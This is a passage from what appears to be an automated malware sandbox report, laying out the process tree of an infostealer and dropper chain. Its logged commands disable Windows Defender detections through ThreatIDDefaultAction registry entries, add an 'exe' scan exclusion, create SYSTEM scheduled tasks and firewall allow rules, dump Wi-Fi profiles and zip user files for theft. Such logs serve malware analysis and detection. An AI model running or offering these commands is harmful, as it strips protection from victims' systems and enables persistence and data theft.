        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:5220
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:3716
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:6128
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:4684
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:6064
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:768
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5884
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:5828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:576
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5896
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS148D.tmp\Install.exe\" it /pMfdidqaJR 385118 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5828
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:6064
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:4108
- - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3076
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4248
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:776
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:2152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\687926120302_Desktop.zip' -CompressionLevel Optimal
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
- - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1124
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4308
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4368
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4620
    - - C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348
    - - C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:576
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:6016
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:6092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 520
      4⤵
      Program crash
      PID:1896
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:1292
- - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      PID:1428
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:2516
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:5064
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:2268
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:688
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:1508
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:2984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:648
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:1560
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        Executes dropped EXE
        
        PID:2984
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:5204
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        Executes dropped EXE
        
        PID:5216
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:5236
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        Executes dropped EXE
        
        PID:5256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:5452
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:5500
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        Executes dropped EXE
        
        PID:5516
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        Executes dropped EXE
        
        PID:5536
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        5⤵
        Executes dropped EXE
        
        PID:5584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:5704
- - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
    "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
    3⤵
    - Executes dropped EXE
    PID:3880
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:688
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4248
  - - C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe
      "C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"
      4⤵
      Executes dropped EXE
      PID:5408
    - - C:\Users\Admin\AppData\Local\Temp\u468.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u468.0.exe"
        5⤵
        
        PID:6116
    - - C:\Users\Admin\AppData\Local\Temp\u468.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u468.1.exe"
        5⤵
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2536
  - - C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      PID:5972
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 492
        5⤵
        Program crash
        
        PID:5656
  - - C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe
      "C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"
      4⤵
      Executes dropped EXE
      PID:2856
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5268
    - - C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"
        5⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:4344
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5800
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:832
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:1492
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5372
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6096

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2000
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:1856
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5600
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:1008
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3812
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4224
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5420
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5748
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:2984
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:832

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5272
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5328
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5988
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5140
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6052
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2540
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6112
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5940
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:2540
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:5576
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:5416

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5620
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5668
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:6104
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5460
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5128
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:6100
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:4204
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:912
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:4412
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:4404

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1328

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
- Executes dropped EXE
PID:5824

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:688

C:\Users\Admin\AppData\Local\Temp\7zSECD1.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSECD1.tmp\Install.exe it /ZLTdidokfV 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
PID:5664
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4240
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4536
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2540
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:3848
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5512
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5520
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5552
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5560
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5576
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5564
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5424
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5676
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5844
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:6100
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5868
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 